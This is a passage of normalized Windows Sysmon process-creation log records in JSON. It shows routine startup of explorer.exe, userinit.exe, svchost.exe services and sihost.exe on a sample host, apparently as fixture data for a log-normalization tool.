"c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\packages\\", "object.property": "creation time", "object.value": "2020-04-25T22:19:26.750Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:26.750Z", "type": "raw", "uuid": "7727892c-8c8c-4312-9de3-51783552efb2"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:35.2369214Z\"},\"EventRecordID\":\"27759\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:22.032\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ProcessId\",\"text\":\"4600\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1131 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Explorer\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"EXPLORER.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=421C8FE40D4A8B70547DCCD21D924B3C58C26F89,MD5=E883B381FDAD6E3125938DCB4EA798BB,SHA256=833500E09588EFA91056C81D86E5773173ADD278E0603E5C90315487117EEEBB,IMPHASH=6D78CE65118DF73A9E7BEAC9366C186A\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b769-5ea4-0000-00101d9c0300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4536\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\userinit.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\explorer.exe", "object.process.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.hash.imphash": "6D78CE65118DF73A9E7BEAC9366C186A", "object.process.hash.md5": "E883B381FDAD6E3125938DCB4EA798BB", "object.process.hash.sha1": "421C8FE40D4A8B70547DCCD21D924B3C58C26F89", "object.process.hash.sha256": "833500E09588EFA91056C81D86E5773173ADD278E0603E5C90315487117EEEBB", "object.process.id": "4600", "object.process.meta": "Description:Windows Explorer | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "explorer.exe", "object.process.original_name": "EXPLORER.EXE", "object.process.parent.cmdline": "C:\\Windows\\system32\\userinit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.guid": "747f3d96-b769-5ea4-0000-00101d9c0300", "object.process.parent.id": "4536", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\", "object.process.version": "10.0.17763.1131 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:22.032Z", "type": "raw", "uuid": "c66a5e6f-6e8e-4ddc-97df-4af84bcd138e"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:35.1257700Z\"},\"EventRecordID\":\"27753\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:21.838\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b769-5ea4-0000-00101d9c0300}\"},{\"Name\":\"ProcessId\",\"text\":\"4536\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\userinit.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Userinit Logon Application\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"USERINIT.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=470C3E60F9B2B6D83F95C7916A5361E34DEC3471,MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001096530000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"568\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"winlogon.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Windows\\system32\\userinit.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.guid": "747f3d96-b769-5ea4-0000-00101d9c0300", "object.process.hash.imphash": "8419D97ABDFEB6C320F0C39028647572", "object.process.hash.md5": "BF8825D08BC235F0609CA8BBEF4E179C", "object.process.hash.sha1": "470C3E60F9B2B6D83F95C7916A5361E34DEC3471", "object.process.hash.sha256": "1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394", "object.process.id": "4536", "object.process.meta": "Description:Userinit Logon Application | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "userinit.exe", "object.process.original_name": "USERINIT.EXE", "object.process.parent.cmdline": "winlogon.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\winlogon.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-001096530000", "object.process.parent.id": "568", "object.process.parent.name": "winlogon.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:21.838Z", "type": "raw", "uuid": "10d009a7-3044-4c58-98a2-f5d80c8c3d52"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:32.3589958Z\"},\"EventRecordID\":\"27747\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:20.786\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b768-5ea4-0000-00106fae0200}\"},{\"Name\":\"ProcessId\",\"text\":\"4264\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s CDPSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s CDPSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b768-5ea4-0000-00106fae0200", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "4264", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:20.786Z", "type": "raw", "uuid": "c7f8d8df-6700-4ba4-8d25-f0ce563d8c0c"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:32.0975707Z\"},\"EventRecordID\":\"27730\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:19.960\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-001097430200}\"},{\"Name\":\"ProcessId\",\"text\":\"3820\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup -s WpnUserService\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s WpnUserService", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b767-5ea4-0000-001097430200", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "3820", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:19.960Z", "type": "raw", "uuid": "d5521104-6ee3-4639-b76e-4ff44f2d3417"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:32.0583315Z\"},\"EventRecordID\":\"27728\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:19.856\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-0010d0310200}\"},{\"Name\":\"ProcessId\",\"text\":\"3760\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup -s CDPUserSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s CDPUserSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b767-5ea4-0000-0010d0310200", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "3760", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:19.856Z", "type": "raw", "uuid": "55a23627-856b-4485-901a-45e0ffb4f68a"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:32.0508694Z\"},\"EventRecordID\":\"27727\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:19.844\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-0010fe2e0200}\"},{\"Name\":\"ProcessId\",\"text\":\"3752\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\sihost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1075 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Shell Infrastructure Host\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 